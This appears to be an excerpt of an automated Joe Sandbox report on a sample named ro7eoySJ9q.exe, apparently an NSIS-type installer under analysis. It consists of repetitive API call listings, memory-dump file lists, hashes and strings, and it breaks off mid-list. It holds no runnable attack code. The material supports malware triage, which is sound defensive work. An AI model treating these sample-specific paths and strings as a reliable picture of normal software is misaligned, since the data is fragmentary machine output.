                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: @.C$N$open
                                                                      • API String ID: 3615053054-801394694
                                                                      • Opcode ID: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                                      • Instruction ID: 99db4efdefbfae6e02fe30a975520441482abf578fd64f5d263331c8f1dab2c3
                                                                      • Opcode Fuzzy Hash: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                                      • Instruction Fuzzy Hash: 517181B1A00209FFDB119F60DD85AAA7B79FF84355F04803AFA05B61E0C778A951CF98
                                                                      APIs
                                                                      • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A62
                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A86
                                                                      • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405A8F
                                                                        • Part of subcall function 00405934: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                                        • Part of subcall function 00405934: lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                                      • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405AAC
                                                                      • wsprintfA.USER32 ref: 00405ACA
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B05
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B14
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405B2E
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405B5E
                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00430498,00000000,-0000000A,0040A514,00000000,[Rename]), ref: 00405BB4
                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405BC6
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405BCD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405BD4
                                                                        • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                        • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                      • API String ID: 3756836283-899692902
                                                                      • Opcode ID: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                                      • Instruction ID: 2fe29930d4e79bd0ae977f5d9eb33e4478da98161fe3751d0f08acbad4e80cd6
                                                                      • Opcode Fuzzy Hash: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                                      • Instruction Fuzzy Hash: 0C410471200B05BFD2206B219D49F6B3AACEF85715F14043AF941F62D2EA7CF8018A7D
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                      • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                                      • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                      • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                                      APIs
                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 0040603D
                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406051
                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406064
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-2032666725
                                                                      • Opcode ID: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                                      • Instruction ID: fcf87bb4fcb389795acbe35438f6f12f46fcdf00a5008526b505f25df9ba4f2d
                                                                      • Opcode Fuzzy Hash: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                                      • Instruction Fuzzy Hash: B511B62684061299DB307B149C40B7763B8EF95760F51803FED8A732C0E77C5C9297AD
                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 0040252D
                                                                      • lstrlenA.KERNEL32(Heteric,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 00402534
                                                                      • WriteFile.KERNEL32(00000000,?,Heteric,00000000,?,?,00000000,00000011), ref: 00402566
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                                      • String ID: 8$C:\Program Files (x86)\edelweissen\romanblade.ini$Heteric
                                                                      • API String ID: 1453599865-1441359250
                                                                      • Opcode ID: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                                      • Instruction ID: 735716144e4411cb43a0d30ab2875379506436d26c05ff50a3a47e8288d67bee
                                                                      • Opcode Fuzzy Hash: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                                      • Instruction Fuzzy Hash: 62019271A44604FED700ABB19E4DEAF7668EF5031AF20053BB102B60D1D6FC4D919A6D
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404019
                                                                      • GetSysColor.USER32(00000000), ref: 00404035
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404041
                                                                      • SetBkMode.GDI32(?,?), ref: 0040404D
                                                                      • GetSysColor.USER32(?), ref: 00404060
                                                                      • SetBkColor.GDI32(?,?), ref: 00404070
                                                                      • DeleteObject.GDI32(?), ref: 0040408A
                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404094
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                      • Instruction ID: 0ac1a71073e56fec278c78bb8edfd769e40e3e7d0c6ffac740e8a400aad481d4
                                                                      • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                      • Instruction Fuzzy Hash: 7D2142B1500704ABC7319F68DE48B5B7BF8AF80714F04892DEA96B22A1D738E904CB54
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040280D
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                      • String ID:
                                                                      • API String ID: 3294113728-0
                                                                      • Opcode ID: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
                                                                      • Instruction ID: 2d0112b2776dca8d717dfd9e18d313b89dca9e7a3efaaf21f9fdf9ae57e92bf3
                                                                      • Opcode Fuzzy Hash: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
                                                                      • Instruction Fuzzy Hash: CE317C72800128BBCF116FA5CE499AE7A79EF09364F10423AF521762E0CB794D419BA8
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004048DF
                                                                      • GetMessagePos.USER32 ref: 004048E7
                                                                      • ScreenToClient.USER32(?,?), ref: 00404901
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404913
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404939
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                      • Instruction ID: b2acda07281727c86be124b4dee47d1cf8a7ad48e0f381a449079fc6aa512a42
                                                                      • Opcode Fuzzy Hash: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                      • Instruction Fuzzy Hash: 6F014C71900219BADB10DBA4DD85BFFBBBCAF59711F10012ABB50B61D0D6B499018BA4
                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
                                                                      • MulDiv.KERNEL32(001026CB,00000064,00102FB8), ref: 00402C5E
                                                                      • wsprintfW.USER32 ref: 00402C6E
                                                                      • SetWindowTextW.USER32(?,?), ref: 00402C7E
                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C90
                                                                      Strings
                                                                      • verifying installer: %d%%, xrefs: 00402C68
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%
                                                                      • API String ID: 1451636040-82062127
                                                                      • Opcode ID: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                                      • Instruction ID: fc2375c20bf1a940e442d42f67f4bd9350dc1e6ed8ae84fb9db5d2f1b0513ae1
                                                                      • Opcode Fuzzy Hash: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                                      • Instruction Fuzzy Hash: 28014F70640208BBEF24AF61DD49BEE3B69FB04309F008439FA06A91D0DBB89555CF59
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401D44
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                      • CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
